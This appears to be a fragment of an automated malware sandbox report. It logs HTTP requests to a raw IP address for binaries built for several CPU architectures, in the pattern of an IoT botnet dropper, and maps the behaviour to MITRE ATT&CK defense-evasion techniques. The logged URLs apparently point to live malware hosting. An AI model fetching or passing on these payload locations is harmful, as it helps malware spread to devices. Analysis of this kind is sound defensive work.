- 2.4kB 81.1kB 42 57   HTTP Request: GET http://78.40.117.13/EdiAf.m68k   HTTP Response: 200
- 2.7kB 81.2kB 49 60   HTTP Request: GET http://78.40.117.13/EdiAf.m68k   HTTP Response: 200
- 2.4kB 78.9kB 42 54   HTTP Request: GET http://78.40.117.13/EdiAf.spc   HTTP Response: 200
- 2.6kB 78.8kB 48 53   HTTP Request: GET http://78.40.117.13/EdiAf.spc   HTTP Response: 200
- 473 B 640 B 6 4   HTTP Request: GET http://78.40.117.13/EdiAf.i686   HTTP Response: 404
- 406 B 584 B 6 4   HTTP Request: GET http://78.40.117.13/EdiAf.i686   HTTP Response: 404
- 1.9kB 69.7kB 32 49   HTTP Request: GET http://78.40.117.13/EdiAf.sh4   HTTP Response: 200
- 1.7kB 69.6kB 31 47   HTTP Request: GET http://78.40.117.13/EdiAf.sh4   HTTP Response: 200
- 472 B 639 B 6 4   HTTP Request: GET http://78.40.117.13/EdiAf.arc   HTTP Response: 404
- 405 B 583 B 6 4   HTTP Request: GET http://78.40.117.13/EdiAf.arc   HTTP Response: 404
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Impair Defenses (1)
- Virtualization/Sandbox Evasion (1)
  - System Checks (1)
Downloads